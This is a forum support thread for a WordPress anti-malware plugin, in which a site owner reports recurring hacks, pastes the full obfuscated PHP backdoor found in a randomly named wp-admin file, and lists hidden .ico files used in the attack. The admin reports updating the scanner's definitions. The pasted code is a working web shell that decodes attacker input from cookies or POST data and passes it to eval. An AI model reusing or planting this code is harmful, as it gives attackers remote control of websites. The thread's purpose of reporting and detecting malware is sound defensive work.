Scan potential threats

Home Forums Support Forum Scan potential threats

Tagged: 

This topic contains 3 replies, has 2 voices, and was last updated by  Steven Baron 1 year, 12 months ago.

Viewing 4 posts - 1 through 4 (of 4 total)
  • Author
    Posts
  • #2167

    Steven Baron
    Member

    I have been fighting a continual hack on a bunch of my WP sites.  Then came across your plugin and giving it a shot to see how it works.  So far pretty impressed…

    The majority of the attack seem so be .ICO and .PHP files.  The .ICO are easy as lal I do is a file scan and delete them.  The .PHP seem sot be arbitrary names.  Your scanner picked a bunch up as potential.  For example…

    wp-admin\pv3f8ux4.php contains:

    <?php

    $fqpee = ’4-dcb\’2ypu1tlk763#nmoxav58*seH_0f9igr’;$nueyq = Array();$nueyq[] = $fqpee[29].$fqpee[26];$nueyq[] = $fqpee[17];$nueyq[] = $fqpee[10].$fqpee[0].$fqpee[33].$fqpee[0].$fqpee[14].$fqpee[14].$fqpee[10].$fqpee[10].$fqpee[1].$fqpee[31].$fqpee[22].$fqpee[31].$fqpee[14].$fqpee[1].$fqpee[0].$fqpee[24].$fqpee[10].$fqpee[22].$fqpee[1].$fqpee[4].$fqpee[10].$fqpee[4].$fqpee[0].$fqpee[1].$fqpee[15].$fqpee[25].$fqpee[31].$fqpee[16].$fqpee[32].$fqpee[28].$fqpee[14].$fqpee[6].$fqpee[22].$fqpee[32].$fqpee[4].$fqpee[28];$nueyq[] = $fqpee[3].$fqpee[20].$fqpee[9].$fqpee[18].$fqpee[11];$nueyq[] = $fqpee[27].$fqpee[11].$fqpee[36].$fqpee[30].$fqpee[36].$fqpee[28].$fqpee[8].$fqpee[28].$fqpee[22].$fqpee[11];$nueyq[] = $fqpee[28].$fqpee[21].$fqpee[8].$fqpee[12].$fqpee[20].$fqpee[2].$fqpee[28];$nueyq[] = $fqpee[27].$fqpee[9].$fqpee[4].$fqpee[27].$fqpee[11].$fqpee[36];$nueyq[] = $fqpee[22].$fqpee[36].$fqpee[36].$fqpee[22].$fqpee[7].$fqpee[30].$fqpee[19].$fqpee[28].$fqpee[36].$fqpee[35].$fqpee[28];$nueyq[] = $fqpee[27].$fqpee[11].$fqpee[36].$fqpee[12].$fqpee[28].$fqpee[18];$nueyq[] = $fqpee[8].$fqpee[22].$fqpee[3].$fqpee[13];foreach ($nueyq[7]($_COOKIE, $_POST) as $jsipkrj => $gnufbpt){function xbhdvq($nueyq, $jsipkrj, $swvqcr){return $nueyq[6]($nueyq[4]($jsipkrj . $nueyq[2], ($swvqcr / $nueyq[8]($jsipkrj)) + 1), 0, $swvqcr);}function iopoq($nueyq, $bartqre){return @$nueyq[9]($nueyq[0], $bartqre);}function cwrxi($nueyq, $bartqre){$ynhwgv = $nueyq[3]($bartqre) % 3;if (!$ynhwgv) {eval($bartqre[1]($bartqre[2]));exit();}}$gnufbpt = iopoq($nueyq, $gnufbpt);cwrxi($nueyq, $nueyq[5]($nueyq[1], $gnufbpt ^ xbhdvq($nueyq, $jsipkrj, $nueyq[8]($gnufbpt))));}

    Is there any way that if I submit files and code that you can add them to the threat list?  Or is this, just one of those things that will require manual intervention each time? Other suggestions?

    While I can easily navigate to the location it would be nice if the potential threat section had a check box to allow selection and deletion of files.

    #2168

    Anti-Malware Admin
    Key Master

    Thanks for sending me this code sample. This is another variant a wide-spread threat that has popped up recently. I have updated the definition with this new variant so my plugin should now be able to find and fix this one too. Please download the latest definition update and let me know if there’s anything else.

    #2169

    Steven Baron
    Member

    There are litterly dozens of these randomly named files that are scattered through out the sites.  The code in each on is very different but seems to use the same base for encryption.  With that it seems that .ICO files are apart of the attack.  I would recommend removing it from the skip files with the following extensions.  Do you want me to send you more code samples for comparison?

    Also in addition to the manual removal request ability on the potential threat location, maybe you should have a submit for evaluation as an option next to the “white list” when you click on the file.  This would save a lot of time reporting and getting the attack code in your hands quicker  If you think it might be miss used then maybe activate that option for users that have donated as it will validate the user and allow a little tighter control.

    #2170

    Steven Baron
    Member

    Here is an example of 2 .ICO files from different sites that were found once I removed it from the skip files and was caught by the scanner…

    wp-includes/js/thickbox/.bcb5a93b.ico
    wp-content/plugins/skimlinks/.f397826e.ico

Viewing 4 posts - 1 through 4 (of 4 total)

You must be logged in to reply to this topic.

Comments are closed.